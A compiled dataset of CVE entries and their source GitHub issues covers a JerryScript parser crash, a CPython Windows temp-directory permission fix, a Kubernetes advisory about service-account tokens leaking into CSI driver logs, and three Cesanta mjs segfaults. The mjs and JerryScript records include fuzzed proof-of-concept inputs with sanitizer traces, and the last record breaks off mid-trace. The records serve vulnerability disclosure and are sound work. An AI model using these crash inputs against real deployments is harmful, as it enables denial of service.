This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : SEGV in parser_parse_class /jerryscript/jerry-core/parser/js/js-parser-expr.c:1107:38 Issue date: --- start body --- ###### JerryScript revision cefd391772529c8a9531d7b3c244d78d38be47c6 ###### Build platform Ubuntu 22.04.3 ###### Build steps ```sh python ./tools/build.py --builddir=xxx --clean --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --stack-limit=20 ``` ###### Test case ```sh function f(){return} switch (1) { case class extends c { static { } ; }: break} while (false) {continue} ``` ###### Execution steps ```sh ./xxx/bin/jerry poc.js ``` ###### Output ```sh Program received signal SIGSEGV, Segmentation fault. AddressSanitizer:DEADLYSIGNAL ================================================================= ==1654425==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x5615b924fb62 bp 0x7ffc42a950d0 sp 0x7ffc42a94f40 T0) ==1654425==The signal is caused by a WRITE memory access. ==1654425==Hint: address points to the zero page. #0 0x5615b924fb62 in parser_parse_class /jerryscript/jerry-core/parser/js/js-parser-expr.c:1107:38 #1 0x5615b92536bf in parser_parse_unary_expression /jerryscript/jerry-core/parser/js/js-parser-expr.c:2217:7 #2 0x5615b92536bf in parser_parse_expression /jerryscript/jerry-core/parser/js/js-parser-expr.c:4115:9 #3 0x5615b927125e in parser_parse_case_statement /jerryscript/jerry-core/parser/js/js-parser-statm.c:2031:5 #4 0x5615b927125e in parser_parse_statements /jerryscript/jerry-core/parser/js/js-parser-statm.c:2909:9 #5 0x5615b9193185 in parser_parse_source /jerryscript/jerry-core/parser/js/js-parser.c:2280:5 #6 0x5615b9191500 in parser_parse_script /jerryscript/jerry-core/parser/js/js-parser.c:3332:38 #7 0x5615b90a43c9 in jerry_parse_common /jerryscript/jerry-core/api/jerryscript.c:418:21 #8 0x5615b90a422b in jerry_parse /jerryscript/jerry-core/api/jerryscript.c:486:10 #9 0x5615b9289ad1 in jerryx_source_parse_script /jerryscript/jerry-ext/util/sources.c:52:26 #10 0x5615b9289cc3 in jerryx_source_exec_script /jerryscript/jerry-ext/util/sources.c:63:26 #11 0x5615b909d0bb in main /jerryscript/jerry-main/main-desktop.c:156:20 #12 0x7f9c86e91d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #13 0x7f9c86e91e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #14 0x5615b8fdced4 in _start (/jerryscript/0321/bin/jerry+0x71ed4) (BuildId: 8a43acc73309945f9adb42dcffdcdab746b9ecc5) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /jerryscript/jerry-core/parser/js/js-parser-expr.c:1107:38 in parser_parse_class ==1654425==ABORTING ``` --- end body --- comments : --- start comments --- --- end comments ---
2,924
CVE-2024-4030
2024-05-07T21:15:09.467
On Windows a directory returned by tempfile.mkdtemp() would not always have permissions set to restrict reading and writing to the temporary directory by other users, instead usually inheriting the correct permissions from the default location. Alternate configurations or users without a profile directory may not have the intended permissions. If you’re not using Windows or haven’t changed the temporary directory location then you aren’t affected by this vulnerability. On other platforms the returned directory is consistently readable and writable only by the current user. This issue was caused by Python not supporting Unix permissions on Windows. The fix adds support for Unix “700” for the mkdir function on Windows which is used by mkdtemp() to ensure the newly created directory has the proper permissions.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cna@python.org", "tags": null, "url": "https://github.com/python/cpython/commit/81939dad77001556c527485d31a2d0f4a759033e" }, { "source": "cna@python.org", "tags": null, "url": "https://github.com/python/cpython/commit/8ed546679524140d8282175411fd141fe7df070d" }, { "s...
null
null
[ "python", "cpython" ]
Issue
If we interpret `0o700` as "only accessible by the current user", then we can imitate the behaviour with ACLs. <!-- gh-linked-prs --> ### Linked PRs * gh-118488 * gh-118515 * gh-118737 * gh-118738 * gh-118739 * gh-118740 * gh-118741 * gh-118742 * gh-118768 * gh-119056 * gh-119068 * gh-119069 <!-- /gh-linked-prs -->
[CVE-2024-4030] Enable `mkdir(mode=0o700)` to work on Windows
https://api.github.com/repos/python/cpython/issues/118486/comments
2
2024-05-01T19:53:53Z
2024-05-24T17:56:51Z
https://github.com/python/cpython/issues/118486
2,274,095,396
118,486
[ -0.043284546583890915, -0.010684003122150898, -0.005946638528257608, 0.014037557877600193, 0.020295865833759308, 0.04021772742271423, 0.035181161016225815, 0.045852698385715485, 0.015720568597316742, 0.023300351575016975, 0.020969068631529808, -0.004534779582172632, 0.012148845940828323, -...
1,137
This is a GitHub Issue repo:cpython owner:python Title : [CVE-2024-4030] Enable `mkdir(mode=0o700)` to work on Windows Issue date: --- start body --- If we interpret `0o700` as "only accessible by the current user", then we can imitate the behaviour with ACLs. <!-- gh-linked-prs --> ### Linked PRs * gh-118488 * gh-118515 * gh-118737 * gh-118738 * gh-118739 * gh-118740 * gh-118741 * gh-118742 * gh-118768 * gh-119056 * gh-119068 * gh-119069 <!-- /gh-linked-prs --> --- end body --- comments : --- start comments --- --- end comments ---
543
CVE-2024-3744
2024-05-15T01:15:07.843
A security issue was discovered in azure-file-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when TokenRequests is configured in the CSIDriver object and the driver is set to run at log level 2 or greater via the -v flag.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2, "impactScore": 4, "source": "jordan@liggitt.net", "type": "Secondary" } ] }
[ { "source": "jordan@liggitt.net", "tags": null, "url": "https://github.com/kubernetes/kubernetes/issues/124759" }, { "source": "jordan@liggitt.net", "tags": null, "url": "https://groups.google.com/g/kubernetes-security-announce/c/hcgZE2MQo1A/m/Y4C6q-CYAgAJ" } ]
null
null
[ "kubernetes", "kubernetes" ]
Issue
CVSS Rating: [CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N) - **MEDIUM** (6.5) A security issue was discovered in azure-file-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when [TokenRequests is configured in the CSIDriver object](https://kubernetes-csi.github.io/docs/token-requests.html) and the driver is set to run at log level 2 or greater via the -v flag. This issue has been rated **MEDIUM** [CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N) (6.5), and assigned **CVE-2024-3744** ### Am I vulnerable? You may be vulnerable if [TokenRequests is configured in the CSIDriver object](https://kubernetes-csi.github.io/docs/token-requests.html) and the driver is set to run at log level 2 or greater via the -v flag. To check if token requests are configured, run the following command: kubectl get csidriver file.csi.azure.com -o jsonpath="{.spec.tokenRequests}" To check if tokens are being logged, examine the secrets-store container log: kubectl logs csi-azurefile-controller-56bfddd689-dh5tk -c azurefile -f | grep --line-buffered "csi.storage.k8s.io/serviceAccount.tokens" #### Affected Versions - azure-file-csi-driver <= v1.29.3 - azure-file-csi-driver v1.30.0 ### How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by running azure-file-csi-driver at log level 0 or 1 via the -v flag. #### Fixed Versions - azure-file-csi-driver v1.29.4 - azure-file-csi-driver v1.30.1 To upgrade, refer to the documentation: https://github.com/kubernetes-sigs/azurefile-csi-driver?tab=readme-ov-file#install-driver-on-a-kubernetes-cluster ### Detection Examine cloud provider logs for unexpected token exchanges, as well as unexpected access to cloud resources. If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Acknowledgements This vulnerability was patched by Weizhi Chen @cvvz from Microsoft. Thank You, Rita Zhang on behalf of the Kubernetes Security Response Committee /triage accepted /lifecycle frozen /area security /kind bug /committee security-response
CVE-2024-3744: azure-file-csi-driver discloses service account tokens in logs
https://api.github.com/repos/kubernetes/kubernetes/issues/124759/comments
1
2024-05-08T16:02:57Z
2024-05-15T00:45:12Z
https://github.com/kubernetes/kubernetes/issues/124759
2,285,943,659
124,759
[ -0.0073183816857635975, -0.0324457548558712, 0.0019513366278260946, -0.001871335320174694, 0.02494649961590767, -0.01632026955485344, -0.0009504504851065576, 0.04215721786022186, -0.002502650022506714, 0.03475535660982132, -0.007499254308640957, -0.020577730610966682, 0.016515055671334267, ...
1,138
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : CVE-2024-3744: azure-file-csi-driver discloses service account tokens in logs Issue date: --- start body --- CVSS Rating: [CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N) - **MEDIUM** (6.5) A security issue was discovered in azure-file-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when [TokenRequests is configured in the CSIDriver object](https://kubernetes-csi.github.io/docs/token-requests.html) and the driver is set to run at log level 2 or greater via the -v flag. This issue has been rated **MEDIUM** [CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N) (6.5), and assigned **CVE-2024-3744** ### Am I vulnerable? You may be vulnerable if [TokenRequests is configured in the CSIDriver object](https://kubernetes-csi.github.io/docs/token-requests.html) and the driver is set to run at log level 2 or greater via the -v flag. To check if token requests are configured, run the following command: kubectl get csidriver file.csi.azure.com -o jsonpath="{.spec.tokenRequests}" To check if tokens are being logged, examine the secrets-store container log: kubectl logs csi-azurefile-controller-56bfddd689-dh5tk -c azurefile -f | grep --line-buffered "csi.storage.k8s.io/serviceAccount.tokens" #### Affected Versions - azure-file-csi-driver <= v1.29.3 - azure-file-csi-driver v1.30.0 ### How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by running azure-file-csi-driver at log level 0 or 1 via the -v flag. #### Fixed Versions - azure-file-csi-driver v1.29.4 - azure-file-csi-driver v1.30.1 To upgrade, refer to the documentation: https://github.com/kubernetes-sigs/azurefile-csi-driver?tab=readme-ov-file#install-driver-on-a-kubernetes-cluster ### Detection Examine cloud provider logs for unexpected token exchanges, as well as unexpected access to cloud resources. If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Acknowledgements This vulnerability was patched by Weizhi Chen @cvvz from Microsoft. Thank You, Rita Zhang on behalf of the Kubernetes Security Response Committee /triage accepted /lifecycle frozen /area security /kind bug /committee security-response --- end body --- comments : --- start comments --- --- end comments ---
2,755
CVE-2024-35384
2024-05-21T14:15:12.217
An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_array_length function in the mjs.c file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/cesanta/mjs/issues/287" } ]
null
null
[ "cesanta", "mjs" ]
Issue
**The name of an affected Product** [mjs](https://github.com/cesanta/mjs) **The affected version** Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) (Tag: [2.20.0](https://github.com/cesanta/mjs/releases/tag/2.20.0)) **Description** An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_array_length function in the mjs.c file. **Vulnerability Type** Segmentation fault **Environment** - Operating System Ubuntu 20.04 - Steps to Reproduce ``` git clone https://github.com/cesanta/mjs cd mjs git checkout b1b6eac gcc -DMJS_MAIN -fsanitize=address mjs.c -ldl -g -o mjs-asan ``` <details> <summary>poc</summary> <!-- summary 아래 한칸 공백 두어야함 --> ``` let c = { a: 7111.111, a: 7111.1111, foo: ffi-= 62.1-11, foo: 1.1111, foo: ffi-= 66111, a: 7111.1111, foo: ffi-= 62.1-11, foo: 1.1111, foo: ffi-= 66.1511, foo: ffi-= 66.1511, foo: ffi-= 1, foo: ffi-= 111, foo: ffi-= 66.1511, foo: ffi('iit)««««««o: 1.«'), }; ``` </details> **run command** `./mjs-asan -f poc` **gdb info** ``` Program received signal SIGSEGV, Segmentation fault. 0x000055555557938f in mjs_array_length (mjs=0x1000000010, v=106790066848102) at mjs.c:6929 6929 unsigned long mjs_array_length(struct mjs *mjs, mjs_val_t v) { --Type <RET> for more, q to quit, c to continue without paging-- #0 0x000055555557938f in mjs_array_length (mjs=0x1000000010, v=106790066848102) at mjs.c:6929 #1 0x0000555555585183 in mjs_exec_internal (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_2", src=0x612000000040 " let c = {\n a: 7111.111, a: 7111.1111,\nfoo: ffi-=\t62.1-11,\n foo: 1.1111,\nfoo: ffi-=\t66111, a: 7111.1111,\nfoo: ffi-=\t62.1-11,\n foo: 1.1111,\nfoo: ffi-=\t66.1511,\n\tfoo: ffi-=\t66.1511,\n\t \nfoo: ffi-=\t\t\t\t"..., generate_jsc=0, res=0x7fffffffdab0) at mjs.c:9044 #2 0x0000555555585460 in mjs_exec_file (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_2", res=0x7fffffffdb80) at mjs.c:9067 #3 0x00005555555913e1 in main (argc=3, argv=0x7fffffffdcd8) at mjs.c:11406 ``` **address sanitizer info** ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==1337947==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555557938f bp 0x7fffffffda10 sp 0x7fffffffd708 T0) ==1337947==The signal is caused by a READ memory access. ==1337947==Hint: address points to the zero page. #0 0x55555557938e in mjs_array_length /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929 #1 0x555555585182 in mjs_exec_internal /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9044 #2 0x55555558545f in mjs_exec_file /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9067 #3 0x5555555913e0 in main /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:11406 #4 0x7ffff73a1082 in __libc_start_main ../csu/libc-start.c:308 #5 0x55555555c8ed in _start (/data1/hjkim/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs-asan+0x88ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929 in mjs_array_length ==1337947==ABORTING ```
Segmentation fault on mjs_array_length
https://api.github.com/repos/cesanta/mjs/issues/287/comments
0
2024-05-09T09:28:46Z
2024-05-09T09:28:46Z
https://github.com/cesanta/mjs/issues/287
2,287,283,663
287
[ -0.009904138743877411, 0.002951771253719926, 0.000015354675269918516, 0.022467993199825287, 0.044700875878334045, 0.023099860176444054, -0.01121930219233036, 0.04158562794327736, -0.023614170029759407, 0.007266463711857796, -0.025098321959376335, 0.00736197829246521, 0.010609477758407593, ...
1,139
This is a GitHub Issue repo:mjs owner:cesanta Title : Segmentation fault on mjs_array_length Issue date: --- start body --- **The name of an affected Product** [mjs](https://github.com/cesanta/mjs) **The affected version** Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) (Tag: [2.20.0](https://github.com/cesanta/mjs/releases/tag/2.20.0)) **Description** An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_array_length function in the mjs.c file. **Vulnerability Type** Segmentation fault **Environment** - Operating System Ubuntu 20.04 - Steps to Reproduce ``` git clone https://github.com/cesanta/mjs cd mjs git checkout b1b6eac gcc -DMJS_MAIN -fsanitize=address mjs.c -ldl -g -o mjs-asan ``` <details> <summary>poc</summary> <!-- summary 아래 한칸 공백 두어야함 --> ``` let c = { a: 7111.111, a: 7111.1111, foo: ffi-= 62.1-11, foo: 1.1111, foo: ffi-= 66111, a: 7111.1111, foo: ffi-= 62.1-11, foo: 1.1111, foo: ffi-= 66.1511, foo: ffi-= 66.1511, foo: ffi-= 1, foo: ffi-= 111, foo: ffi-= 66.1511, foo: ffi('iit)««««««o: 1.«'), }; ``` </details> **run command** `./mjs-asan -f poc` **gdb info** ``` Program received signal SIGSEGV, Segmentation fault. 0x000055555557938f in mjs_array_length (mjs=0x1000000010, v=106790066848102) at mjs.c:6929 6929 unsigned long mjs_array_length(struct mjs *mjs, mjs_val_t v) { --Type <RET> for more, q to quit, c to continue without paging-- #0 0x000055555557938f in mjs_array_length (mjs=0x1000000010, v=106790066848102) at mjs.c:6929 #1 0x0000555555585183 in mjs_exec_internal (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_2", src=0x612000000040 " let c = {\n a: 7111.111, a: 7111.1111,\nfoo: ffi-=\t62.1-11,\n foo: 1.1111,\nfoo: ffi-=\t66111, a: 7111.1111,\nfoo: ffi-=\t62.1-11,\n foo: 1.1111,\nfoo: ffi-=\t66.1511,\n\tfoo: ffi-=\t66.1511,\n\t \nfoo: ffi-=\t\t\t\t"..., generate_jsc=0, res=0x7fffffffdab0) at mjs.c:9044 #2 0x0000555555585460 in mjs_exec_file (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_2", res=0x7fffffffdb80) at mjs.c:9067 #3 0x00005555555913e1 in main (argc=3, argv=0x7fffffffdcd8) at mjs.c:11406 ``` **address sanitizer info** ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==1337947==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555557938f bp 0x7fffffffda10 sp 0x7fffffffd708 T0) ==1337947==The signal is caused by a READ memory access. ==1337947==Hint: address points to the zero page. #0 0x55555557938e in mjs_array_length /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929 #1 0x555555585182 in mjs_exec_internal /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9044 #2 0x55555558545f in mjs_exec_file /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9067 #3 0x5555555913e0 in main /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:11406 #4 0x7ffff73a1082 in __libc_start_main ../csu/libc-start.c:308 #5 0x55555555c8ed in _start (/data1/hjkim/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs-asan+0x88ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929 in mjs_array_length ==1337947==ABORTING ``` --- end body --- comments : --- start comments --- --- end comments ---
3,537
CVE-2024-35385
2024-05-21T14:15:12.307
An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_mk_ffi_sig function in the mjs.c file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/cesanta/mjs/issues/288" } ]
null
null
[ "cesanta", "mjs" ]
Issue
**The name of an affected Product** [mjs](https://github.com/cesanta/mjs) **The affected version** Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) (Tag: [2.20.0](https://github.com/cesanta/mjs/releases/tag/2.20.0)) **Description** An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_mk_ffi_sig function in the mjs.c file. **Vulnerability Type** Segmentation fault **Environment** - Operating System Ubuntu 20.04 - Steps to Reproduce ``` git clone https://github.com/cesanta/mjs cd mjs git checkout b1b6eac gcc -DMJS_MAIN -fsanitize=address mjs.c -ldl -g -o mjs-asan ``` <details> <summary>poc</summary> <!-- summary 아래 한칸 공백 두어야함 --> ``` let o = { a: 7111.1111, a: 7111.1111, foo: 1.1111, foo: ffi-= 44.1111, foofoo: 1.1111, foo: ffi-= 44.1111, foo: ffi('int)««««Ž«o: 1.«'), }; ``` </details> **run command** `./mjs-asan -f poc` **gdb info** ``` Program received signal SIGSEGV, Segmentation fault. 0x0000555555589710 in mjs_mk_ffi_sig (mjs=0x55555559fa76 <mjs_get_ptr+55>) at mjs.c:9774 9774 MJS_PRIVATE mjs_val_t mjs_mk_ffi_sig(struct mjs *mjs) { --Type <RET> for more, q to quit, c to continue without paging-- #0 0x0000555555589710 in mjs_mk_ffi_sig (mjs=0x55555559fa76 <mjs_get_ptr+55>) at mjs.c:9774 #1 0x0000555555583ffd in mjs_execute (mjs=0x615000000080, off=0, res=0x7fffffffd9f0) at mjs.c:8824 #2 0x0000555555585183 in mjs_exec_internal (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_3", src=0x60e000000120 " let o = {\n a: 7111.1111,\n a: 7111.1111,\n foo: 1.1111,\n foo: ffi-=\t44.1111,\n\t foofoo: 1.1111,\n foo: ffi-=\t44.1111,\n\t foo: ffi('int)\001\253\253\253\253\216\253o: 1.\253'),\n};", generate_jsc=0, res=0x7fffffffdab0) at mjs.c:9044 #3 0x0000555555585460 in mjs_exec_file (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_3", res=0x7fffffffdb80) at mjs.c:9067 #4 0x00005555555913e1 in main (argc=3, argv=0x7fffffffdcd8) at mjs.c:11406 ``` **address sanitizer info** ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==1338032==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x555555589710 bp 0x7fffffffda10 sp 0x7fffffffd708 T0) ==1338032==The signal is caused by a READ memory access. ==1338032==Hint: address points to the zero page. #0 0x55555558970f in mjs_mk_ffi_sig /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9774 #1 0x555555583ffc in mjs_execute /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:8824 #2 0x555555585182 in mjs_exec_internal /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9044 #3 0x55555558545f in mjs_exec_file /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9067 #4 0x5555555913e0 in main /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:11406 #5 0x7ffff73a1082 in __libc_start_main ../csu/libc-start.c:308 #6 0x55555555c8ed in _start (/data1/hjkim/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs-asan+0x88ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9774 in mjs_mk_ffi_sig ==1338032==ABORTING ```
Segmentation fault on mjs_mk_ffi_sig
https://api.github.com/repos/cesanta/mjs/issues/288/comments
0
2024-05-09T09:35:09Z
2024-05-09T09:35:09Z
https://github.com/cesanta/mjs/issues/288
2,287,295,520
288
[ -0.008865464478731155, -0.013632950372993946, -0.0008801088551990688, 0.0197762381285429, 0.032989826053380966, 0.031224092468619347, -0.00822538509964943, 0.04022934287786484, -0.03331354632973671, 0.016995204612612724, -0.03319583088159561, 0.012235076166689396, -0.002089453861117363, 0....
1,140
This is a GitHub Issue repo:mjs owner:cesanta Title : Segmentation fault on mjs_mk_ffi_sig Issue date: --- start body --- **The name of an affected Product** [mjs](https://github.com/cesanta/mjs) **The affected version** Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) (Tag: [2.20.0](https://github.com/cesanta/mjs/releases/tag/2.20.0)) **Description** An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_mk_ffi_sig function in the mjs.c file. **Vulnerability Type** Segmentation fault **Environment** - Operating System Ubuntu 20.04 - Steps to Reproduce ``` git clone https://github.com/cesanta/mjs cd mjs git checkout b1b6eac gcc -DMJS_MAIN -fsanitize=address mjs.c -ldl -g -o mjs-asan ``` <details> <summary>poc</summary> <!-- summary 아래 한칸 공백 두어야함 --> ``` let o = { a: 7111.1111, a: 7111.1111, foo: 1.1111, foo: ffi-= 44.1111, foofoo: 1.1111, foo: ffi-= 44.1111, foo: ffi('int)««««Ž«o: 1.«'), }; ``` </details> **run command** `./mjs-asan -f poc` **gdb info** ``` Program received signal SIGSEGV, Segmentation fault. 0x0000555555589710 in mjs_mk_ffi_sig (mjs=0x55555559fa76 <mjs_get_ptr+55>) at mjs.c:9774 9774 MJS_PRIVATE mjs_val_t mjs_mk_ffi_sig(struct mjs *mjs) { --Type <RET> for more, q to quit, c to continue without paging-- #0 0x0000555555589710 in mjs_mk_ffi_sig (mjs=0x55555559fa76 <mjs_get_ptr+55>) at mjs.c:9774 #1 0x0000555555583ffd in mjs_execute (mjs=0x615000000080, off=0, res=0x7fffffffd9f0) at mjs.c:8824 #2 0x0000555555585183 in mjs_exec_internal (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_3", src=0x60e000000120 " let o = {\n a: 7111.1111,\n a: 7111.1111,\n foo: 1.1111,\n foo: ffi-=\t44.1111,\n\t foofoo: 1.1111,\n foo: ffi-=\t44.1111,\n\t foo: ffi('int)\001\253\253\253\253\216\253o: 1.\253'),\n};", generate_jsc=0, res=0x7fffffffdab0) at mjs.c:9044 #3 0x0000555555585460 in mjs_exec_file (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_3", res=0x7fffffffdb80) at mjs.c:9067 #4 0x00005555555913e1 in main (argc=3, argv=0x7fffffffdcd8) at mjs.c:11406 ``` **address sanitizer info** ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==1338032==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x555555589710 bp 0x7fffffffda10 sp 0x7fffffffd708 T0) ==1338032==The signal is caused by a READ memory access. ==1338032==Hint: address points to the zero page. #0 0x55555558970f in mjs_mk_ffi_sig /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9774 #1 0x555555583ffc in mjs_execute /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:8824 #2 0x555555585182 in mjs_exec_internal /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9044 #3 0x55555558545f in mjs_exec_file /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9067 #4 0x5555555913e0 in main /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:11406 #5 0x7ffff73a1082 in __libc_start_main ../csu/libc-start.c:308 #6 0x55555555c8ed in _start (/data1/hjkim/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs-asan+0x88ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9774 in mjs_mk_ffi_sig ==1338032==ABORTING ``` --- end body --- comments : --- start comments --- --- end comments ---
3,552
CVE-2024-35386
2024-05-21T14:15:12.400
An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_do_gc function in the mjs.c file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/cesanta/mjs/issues/286" } ]
null
null
[ "cesanta", "mjs" ]
Issue
**The name of an affected Product** [mjs](https://github.com/cesanta/mjs) **The affected version** Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) (Tag: [2.20.0](https://github.com/cesanta/mjs/releases/tag/2.20.0)) **Description** An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_do_gc function in the mjs.c file. **Vulnerability Type** Segmentation fault **Environment** - Operating System Ubuntu 20.04 - Steps to Reproduce ``` git clone https://github.com/cesanta/mjs cd mjs git checkout b1b6eac gcc -DMJS_MAIN -fsanitize=address mjs.c -ldl -g -o mjs-asan ``` <details> <summary>poc</summary> <!-- summary 아래 한칸 공백 두어야함 --> ` gc(3+gc)(gc )` </details> **run command** `./mjs-asan -f poc` **gdb info** ``` Program received signal SIGSEGV, Segmentation fault. 0x000055555557bada in mjs_do_gc (mjs=0x55555559fa76 <mjs_get_ptr+55>) at mjs.c:7360 7360 static void mjs_do_gc(struct mjs *mjs) { --Type <RET> for more, q to quit, c to continue without paging-- #0 0x000055555557bada in mjs_do_gc (mjs=0x55555559fa76 <mjs_get_ptr+55>) at mjs.c:7360 #1 0x0000555555583ffd in mjs_execute (mjs=0x615000000080, off=0, res=0x7fffffffd9f0) at mjs.c:8824 #2 0x0000555555585183 in mjs_exec_internal (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_1", src=0x602000000050 " gc(3+gc)(gc )", generate_jsc=0, res=0x7fffffffdab0) at mjs.c:9044 #3 0x0000555555585460 in mjs_exec_file (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_1", res=0x7fffffffdb80) at mjs.c:9067 #4 0x00005555555913e1 in main (argc=3, argv=0x7fffffffdcd8) at mjs.c:11406 ``` **address sanitizer info** ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==1337961==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555557bada bp 0x7fffffffda10 sp 0x7fffffffd708 T0) ==1337961==The 